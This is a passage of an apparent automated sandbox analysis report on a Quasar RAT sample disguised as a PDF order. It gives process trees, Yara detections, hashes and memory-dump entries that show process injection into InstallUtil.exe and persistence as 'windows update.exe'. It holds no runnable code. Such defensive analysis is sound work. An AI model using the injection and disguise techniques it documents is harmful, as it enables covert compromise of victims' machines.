                                                                              • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:10:23:13
                                                                              Start date:18/11/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                              Imagebase:0xf80000
                                                                              File size:42'064 bytes
                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000002.00000002.2233106739.0000000000720000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:10:23:15
                                                                              Start date:18/11/2024
                                                                              Path:C:\Users\user\AppData\Roaming\SubDir\windows update.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
                                                                              Imagebase:0x470000
                                                                              File size:42'064 bytes
                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 0%, ReversingLabs
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:10:23:15
                                                                              Start date:18/11/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:10:23:26
                                                                              Start date:18/11/2024
                                                                              Path:C:\Users\user\AppData\Roaming\SubDir\windows update.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
                                                                              Imagebase:0x3c0000
                                                                              File size:42'064 bytes
                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:10:23:26
                                                                              Start date:18/11/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:10:23:34
                                                                              Start date:18/11/2024
                                                                              Path:C:\Users\user\AppData\Roaming\SubDir\windows update.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
                                                                              Imagebase:0x6d0000
                                                                              File size:42'064 bytes
                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:10:23:34
                                                                              Start date:18/11/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true


                                                                                Execution Graph

                                                                                Execution Coverage:9.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:9.1%
                                                                                Total number of Nodes:154
                                                                                Total number of Limit Nodes:9

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: d%cq$d%cq$$]q$$]q
                                                                                • API String ID: 0-2396156113
                                                                                • Opcode ID: 3a338a6330d99b0f271b88a1cfd3d66840c0d00a64e6245662723b0cb5f88920
                                                                                • Instruction ID: b426ca9e5f5b22997ea157c400f758225b106f0fe2d499621c7f3ec16361598d
                                                                                • Opcode Fuzzy Hash: 3a338a6330d99b0f271b88a1cfd3d66840c0d00a64e6245662723b0cb5f88920
                                                                                • Instruction Fuzzy Hash: 2D614931B043158FC709DB39AC50B2A7BAABFD6310F214966D406CF3E5DAB1EC41A792

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: fbq$8
                                                                                • API String ID: 0-3186246319
                                                                                • Opcode ID: 90ddee7ba0079dc674f2bd364c91e884eaf65d2d6512c417ff10b02674144adb
                                                                                • Instruction ID: ab4d4e9f60b577c754f40db60024d36d70b4ee8ff9b8334c6fa7b1f4a1ace77b
                                                                                • Opcode Fuzzy Hash: 90ddee7ba0079dc674f2bd364c91e884eaf65d2d6512c417ff10b02674144adb
                                                                                • Instruction Fuzzy Hash: AB62D475E006298FDB64DF68C850AD9B7B2FB89304F1486EAD90DA7344DB30AE85CF51

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0489B6F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2706961497-0
                                                                                • Opcode ID: 64efd0d9080ad89a4b760cb94e3d9b2441eea79d8897c9d6ebb3adc1005746e6
                                                                                • Instruction ID: d94a2037bc8c57622d42b33cc1f4694f1bbd294ecd881e3c40cb4e8def6c0b95
                                                                                • Opcode Fuzzy Hash: 64efd0d9080ad89a4b760cb94e3d9b2441eea79d8897c9d6ebb3adc1005746e6
                                                                                • Instruction Fuzzy Hash: 642124B5D013499FCB10DFAAD580AEEFBF5FF48310F24842AE419A3210C775A944CBA1

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0489B6F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2706961497-0
                                                                                • Opcode ID: 37f02f49484b33a5052ddb738327d2187f4395189ca58d22b34317b495f8823d
                                                                                • Instruction ID: ce1bef9f267e0331abbce03d9e075e1486a4682523ad4665a12a2bf9f10ea9f9
                                                                                • Opcode Fuzzy Hash: 37f02f49484b33a5052ddb738327d2187f4395189ca58d22b34317b495f8823d
                                                                                • Instruction Fuzzy Hash: 8121E4B1D013499FCB10DFAAD984AEEFBF5FF48310F24842AE519A7250C775A944CBA1
                                                                                APIs
                                                                                • NtResumeThread.NTDLL(?,?), ref: 0489C70E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 8fa3d583b287e7d2038b244bd5bfd5c8e38e516d57a007d11ccac9b6347be0f4
                                                                                • Instruction ID: a2abff6068386cc399df2303ab8641ad66a5ddbdcf7bdecac8bcc70face4653e
                                                                                • Opcode Fuzzy Hash: 8fa3d583b287e7d2038b244bd5bfd5c8e38e516d57a007d11ccac9b6347be0f4
                                                                                • Instruction Fuzzy Hash: 901112B5D006088FDB10DFAAC5847AEFBF5FF49324F14882AD419A7240CB78A945CFA1
                                                                                APIs
                                                                                • NtResumeThread.NTDLL(?,?), ref: 0489C70E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 2500234af873fb353784830483fbb7aab8ace477de7465eb2e52528b58324e53
                                                                                • Instruction ID: 0f43758d3788df29b90bc4228ccf61ac672e7dde30364607f4aacfb1960ba166
                                                                                • Opcode Fuzzy Hash: 2500234af873fb353784830483fbb7aab8ace477de7465eb2e52528b58324e53
                                                                                • Instruction Fuzzy Hash: 251114B1D002089FDB10DFAAC484AAEFBF5FF49324F54842AD419A7240CB79A945CFA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PH]q
                                                                                • API String ID: 0-3168235125
                                                                                • Opcode ID: 960ab1b93f23071b95d0c96ac2e9c6bb2b14f6ebb1a608f2f78234a3902dac31
                                                                                • Instruction ID: 2e61b1078ea2d7bb24442785a9a10177736cc0889746863c3cfe7262ca704190
                                                                                • Opcode Fuzzy Hash: 960ab1b93f23071b95d0c96ac2e9c6bb2b14f6ebb1a608f2f78234a3902dac31
                                                                                • Instruction Fuzzy Hash: 1BD10570E04618CFDB54CFA9D884BADBBF2BB89304F2485A9D809E7254DB74AD85DF01
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2255218343.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_72c0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Ddq
                                                                                • API String ID: 0-562783569
                                                                                • Opcode ID: 872aed8f753983ddaf463b25e60a3f36dcb7d06700e097ff2ead40bd30bcf29a
                                                                                • Instruction ID: 4926fb45d7e6edc4efb56fb52086cbbd874a69248c689ee9befe891a2a3966dd
                                                                                • Opcode Fuzzy Hash: 872aed8f753983ddaf463b25e60a3f36dcb7d06700e097ff2ead40bd30bcf29a
                                                                                • Instruction Fuzzy Hash: 8ED1A074E00219CFDB58DFA9D990A9DBBB2FF88300F1081A9D509AB365DB31AD81CF41
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fae87944cdc6d891d31bae27b3e45cb545ce926ea110fc8532e84a32c03605bd
                                                                                • Instruction ID: e80d4650fcaf369201f6baf09f8f881d270f87926481672d12d3cb5b8f1902dc
                                                                                • Opcode Fuzzy Hash: fae87944cdc6d891d31bae27b3e45cb545ce926ea110fc8532e84a32c03605bd
                                                                                • Instruction Fuzzy Hash: B3D13770E02258DFDB54DFA9D884B9DBBF1FF49304F2085AAD409AB294EB706985CF01
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: acf367f74ab2ea5f7f8cdb132659e7ecb88646b372073fbc69e5e871b961d4e3
                                                                                • Instruction ID: d7940737532a99d390707fe0eb94a11a828fe590dfa22b9199d13d5b1aaf218f
                                                                                • Opcode Fuzzy Hash: acf367f74ab2ea5f7f8cdb132659e7ecb88646b372073fbc69e5e871b961d4e3
                                                                                • Instruction Fuzzy Hash: B1D12770E02258DFDB54DFA9D884B9DBBF1FF49304F2085AAD409AB294EB706985CF00
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 944d7bdc3b68c1ac03157cea081b75483eb3da288ca833b130002892cf5355f7
                                                                                • Instruction ID: d57f91588ad83c29c9b19d219c4310d252e0aa14242d95274d80fb413767f4fe
                                                                                • Opcode Fuzzy Hash: 944d7bdc3b68c1ac03157cea081b75483eb3da288ca833b130002892cf5355f7
                                                                                • Instruction Fuzzy Hash: 2BA1D5B2E04259DFCB10CF98E890BAEBBB1FF44300F258566E505A7241D738AF45EB51
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 57cabeb314379e6f561ec27be980277373b6ccabcb00d376fd7634f395713b6d
                                                                                • Instruction ID: 97f88ebebe77315386fdd77992354bab7b9619d8b2cff7d5e8f285878efbef54
                                                                                • Opcode Fuzzy Hash: 57cabeb314379e6f561ec27be980277373b6ccabcb00d376fd7634f395713b6d
                                                                                • Instruction Fuzzy Hash: 20B13874E00658CFDB58DFA8C854BADBBF2FB49304F1085AAD509AB255DB34AD85CF01

                                                                                Control-flow Graph

                                                                                control_flow_graph 0 f256e2-f256e3 1 f256e5 0->1 1->1 2 f256e7-f256e8 1->2 3 f25673 2->3 4 f256ea-f256f0 2->4 5 f25695-f256cc 3->5 6 f25675-f25693 3->6 10 f2461e-f24629 5->10 6->5 12 f24637-f24668 10->12 13 f246a4-f24792 10->13 14 f2466a-f2469f 10->14 12->10 38 f25b15 13->38 39 f24798 13->39 14->10 38->38 40 f247a0-f249df 39->40 40->38 53 f249e5-f24b08 40->53 53->38 60 f24b0e-f24c47 53->60 60->38 67 f24c4d-f24d90 60->67 67->38 74 f24d96-f25672 67->74 74->3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: TJbq$jjjjjj$$]q$$]q
                                                                                • API String ID: 0-2713803779
                                                                                • Opcode ID: ca46bfd2c4948e9c7f45762eb14424bebc718e5de4fb522daf9fb86681f6df3d
                                                                                • Instruction ID: da2b40688710d0725df8dca9c7ab4cff61b3d46f763f4f050784f3194140614f
                                                                                • Opcode Fuzzy Hash: ca46bfd2c4948e9c7f45762eb14424bebc718e5de4fb522daf9fb86681f6df3d
                                                                                • Instruction Fuzzy Hash: 21E2177A250510EFDB4A9F98D948D55BBB2FF4D32471A85D8F2099B232C732E861EF40

                                                                                Control-flow Graph

                                                                                control_flow_graph 128 f25711-f25712 129 f256cc 128->129 130 f2461e-f24629 129->130 132 f24637-f24668 130->132 133 f246a4-f24792 130->133 134 f2466a-f2469f 130->134 132->130 158 f25b15 133->158 159 f24798 133->159 134->130 158->158 160 f247a0-f249df 159->160 160->158 173 f249e5-f24b08 160->173 173->158 180 f24b0e-f24c47 173->180 180->158 187 f24c4d-f24d90 180->187 187->158 194 f24d96-f25673 187->194 249 f25695-f256c7 194->249 250 f25675-f25693 194->250 249->129 250->249
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: TJbq$jjjjjj$$]q$$]q
                                                                                • API String ID: 0-2713803779
                                                                                • Opcode ID: fa48d9c510ef9e5a432990f57a5c87797c8e02ea78ec9db9c0854af836dd0278
                                                                                • Instruction ID: 20335d4b95b27777e693a2a96a35ea384a305dee91805e675d58f16d2309f90e
                                                                                • Opcode Fuzzy Hash: fa48d9c510ef9e5a432990f57a5c87797c8e02ea78ec9db9c0854af836dd0278
                                                                                • Instruction Fuzzy Hash: C6D2177A250510EFDB4A9F98D948D55BBB2FF4D32471A85D8F2099B232C732E861EF40

                                                                                Control-flow Graph

                                                                                control_flow_graph 253 f24516-f245b3 255 f25b15 253->255 255->255
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: TJbq$TJbq$jjjjjj$$]q$$]q
                                                                                • API String ID: 0-480122481
                                                                                • Opcode ID: a07dbd11c0185e3934f286c6040ae579ed1f990759051dc37050e79c9de63cb3
                                                                                • Instruction ID: 9792d4956e5278cb168ebba392b49a50d68c7f9f61da130b182994e130b6c6ad
                                                                                • Opcode Fuzzy Hash: a07dbd11c0185e3934f286c6040ae579ed1f990759051dc37050e79c9de63cb3
                                                                                • Instruction Fuzzy Hash: D2B0921240E3C1CF8B124A5444E11647F64AA62140368C4E6C4C68E44BC454C9C6F332

                                                                                Control-flow Graph

                                                                                control_flow_graph 256 f21978-f219d9 261 f219e5-f219f9 256->261 262 f219db-f219df 256->262 264 f21a07-f21a12 261->264 262->261 266 f219fb-f219fe 264->266 266->264 267 f21a00 266->267 267->264 268 f21dd0-f21dd3 267->268 269 f21a76-f21a78 267->269 270 f21c56-f21c5d 267->270 271 f21a14-f21a29 267->271 272 f21a59-f21a74 267->272 273 f21aff 267->273 274 f21c7c-f21c95 267->274 275 f21a3d-f21a42 267->275 276 f21ae3-f21afa 267->276 277 f21dc3-f21dce 267->277 278 f21da6-f21dc1 call f2113c 267->278 279 f21a44-f21a57 267->279 280 f21aca-f21ade 267->280 281 f21c6a-f21c7a 267->281 282 f21a2b-f21a3b 267->282 283 f21a88-f21a8b 267->283 365 f21dd6 call f22140 268->365 366 f21dd6 call f22131 268->366 284 f21b00-f21b03 269->284 285 f21a7e-f21a83 269->285 299 f21c63-f21c68 270->299 271->266 272->266 273->284 303 f21c97-f21c99 274->303 304 f21c9b 274->304 275->266 276->266 286 f21d8d-f21d90 277->286 278->286 279->266 280->266 309 f21c2f-f21c32 281->309 282->266 287 f21a91-f21aa4 283->287 288 f21e35-f21ea1 283->288 284->283 302 f21b05-f21b54 call f2112c 284->302 285->266 290 f21d92 286->290 291 f21d99-f21da4 286->291 287->288 297 f21aaa-f21ab6 287->297 317 f21ea3 288->317 318 f21ee6 288->318 290->268 290->277 290->278 290->291 306 f21e1b-f21e34 290->306 291->286 296 f21ddc-f21de7 296->286 297->288 308 f21abc-f21ac5 297->308 299->309 341 f21b60-f21bcf 302->341 342 f21b56-f21b5a 302->342 311 f21ca0-f21ca2 303->311 304->311 308->266 314 f21c24 309->314 315 f21c34 309->315 320 f21ca4 311->320 321 f21cad 311->321 314->309 315->268 315->270 315->274 315->277 315->278 315->281 315->306 323 f21c3b-f21c4f 315->323 317->318 325 f21ec3-f21ec8 317->325 326 f21ed1-f21ed6 317->326 327 f21eb5-f21eba 317->327 328 f21eca-f21ecf 317->328 329 f21eaa-f21eac 317->329 330 f21ed8-f21edd 317->330 331 f21eae-f21eb3 317->331 332 f21edf-f21ee4 317->332 333 f21ebc-f21ec1 317->333 322 f21ee9-f21eea 318->322 320->321 321->286 323->270 325->322 326->322 327->322 328->322 329->322 330->322 331->322 332->322 333->322 351 f21bd1-f21be4 341->351 352 f21be6-f21bf9 341->352 342->341 355 f21c1b 351->355 358 f21c02 352->358 359 f21bfb-f21c00 352->359 363 f21c1b call f21f38 355->363 364 f21c1b call f21f29 355->364 357 f21c21 357->314 360 f21c04-f21c06 358->360 359->360 360->323 361 f21c08-f21c19 360->361 361->355 363->357 364->357 365->296 366->296
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$TJbq$TJbq$Te]q
                                                                                • API String ID: 0-2582363881
                                                                                • Opcode ID: 2392229a2506011af695e9174d6730d5b031dd36273987e3c00fe9b9fce62d46
                                                                                • Instruction ID: 6610025bf9a23c6eb8b32d97ec3e1fcac2e940e0bf05241bd9b6aa7f2e441720
                                                                                • Opcode Fuzzy Hash: 2392229a2506011af695e9174d6730d5b031dd36273987e3c00fe9b9fce62d46
                                                                                • Instruction Fuzzy Hash: D3E1AF35A041548FCB04CFA8E894B6DBBF1FF59310F2541AAE446DB3A2CA35EC45EB45

                                                                                Control-flow Graph

                                                                                control_flow_graph 788 489bcc7-489bd40 790 489bd79-489bd99 788->790 791 489bd42-489bd4c 788->791 796 489bd9b-489bda5 790->796 797 489bdd2-489be0c 790->797 791->790 792 489bd4e-489bd50 791->792 794 489bd73-489bd76 792->794 795 489bd52-489bd5c 792->795 794->790 798 489bd5e 795->798 799 489bd60-489bd6f 795->799 796->797 801 489bda7-489bda9 796->801 805 489be0e-489be18 797->805 806 489be45-489beba CreateProcessA 797->806 798->799 799->799 800 489bd71 799->800 800->794 802 489bdab-489bdb5 801->802 803 489bdcc-489bdcf 801->803 807 489bdb9-489bdc8 802->807 808 489bdb7 802->808 803->797 805->806 809 489be1a-489be1c 805->809 818 489bebc-489bec2 806->818 819 489bec3-489bf0b 806->819 807->807 810 489bdca 807->810 808->807 811 489be3f-489be42 809->811 812 489be1e-489be28 809->812 810->803 811->806 814 489be2a 812->814 815 489be2c-489be3b 812->815 814->815 815->815 816 489be3d 815->816 816->811 818->819 824 489bf1b-489bf1f 819->824 825 489bf0d-489bf11 819->825 827 489bf2f-489bf33 824->827 828 489bf21-489bf25 824->828 825->824 826 489bf13 825->826 826->824 830 489bf43 827->830 831 489bf35-489bf39 827->831 828->827 829 489bf27 828->829 829->827 833 489bf44 830->833 831->830 832 489bf3b 831->832 832->830 833->833
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0489BEAA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 5e96a70a82273f431512943effd79ed4967e31e5d57a4e41d9346dcef236c0e8
                                                                                • Instruction ID: aaf39ca4913be07400ab968b246f54db0c3bcff60e44362f62f47e016f27719a
                                                                                • Opcode Fuzzy Hash: 5e96a70a82273f431512943effd79ed4967e31e5d57a4e41d9346dcef236c0e8
                                                                                • Instruction Fuzzy Hash: 79812671D006199FDF10CFA9D8857ADBBF2BF48314F188A29E819E7250D774A8818B81

                                                                                Control-flow Graph

                                                                                control_flow_graph 834 489bcd0-489bd40 836 489bd79-489bd99 834->836 837 489bd42-489bd4c 834->837 842 489bd9b-489bda5 836->842 843 489bdd2-489be0c 836->843 837->836 838 489bd4e-489bd50 837->838 840 489bd73-489bd76 838->840 841 489bd52-489bd5c 838->841 840->836 844 489bd5e 841->844 845 489bd60-489bd6f 841->845 842->843 847 489bda7-489bda9 842->847 851 489be0e-489be18 843->851 852 489be45-489beba CreateProcessA 843->852 844->845 845->845 846 489bd71 845->846 846->840 848 489bdab-489bdb5 847->848 849 489bdcc-489bdcf 847->849 853 489bdb9-489bdc8 848->853 854 489bdb7 848->854 849->843 851->852 855 489be1a-489be1c 851->855 864 489bebc-489bec2 852->864 865 489bec3-489bf0b 852->865 853->853 856 489bdca 853->856 854->853 857 489be3f-489be42 855->857 858 489be1e-489be28 855->858 856->849 857->852 860 489be2a 858->860 861 489be2c-489be3b 858->861 860->861 861->861 862 489be3d 861->862 862->857 864->865 870 489bf1b-489bf1f 865->870 871 489bf0d-489bf11 865->871 873 489bf2f-489bf33 870->873 874 489bf21-489bf25 870->874 871->870 872 489bf13 871->872 872->870 876 489bf43 873->876 877 489bf35-489bf39 873->877 874->873 875 489bf27 874->875 875->873 879 489bf44 876->879 877->876 878 489bf3b 877->878 878->876 879->879
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0489BEAA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: b655b4c7134b8eff93e567887539f8e02230fc053f1d14e920a96b63e8e53daa
                                                                                • Instruction ID: 4906847d2b5322e6977f7d32b6703ef77d043bbf5cbfcd9af2848c1f39b7bf39
                                                                                • Opcode Fuzzy Hash: b655b4c7134b8eff93e567887539f8e02230fc053f1d14e920a96b63e8e53daa
                                                                                • Instruction Fuzzy Hash: 70812571D00A599FDF10CFA9D8817ADBBF6BF48314F188A29E818E7250D774A881CF81

                                                                                Control-flow Graph

                                                                                control_flow_graph 880 489c4e8-489c53e 882 489c54e-489c58d WriteProcessMemory 880->882 883 489c540-489c54c 880->883 885 489c58f-489c595 882->885 886 489c596-489c5c6 882->886 883->882 885->886
                                                                                APIs
                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0489C580
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
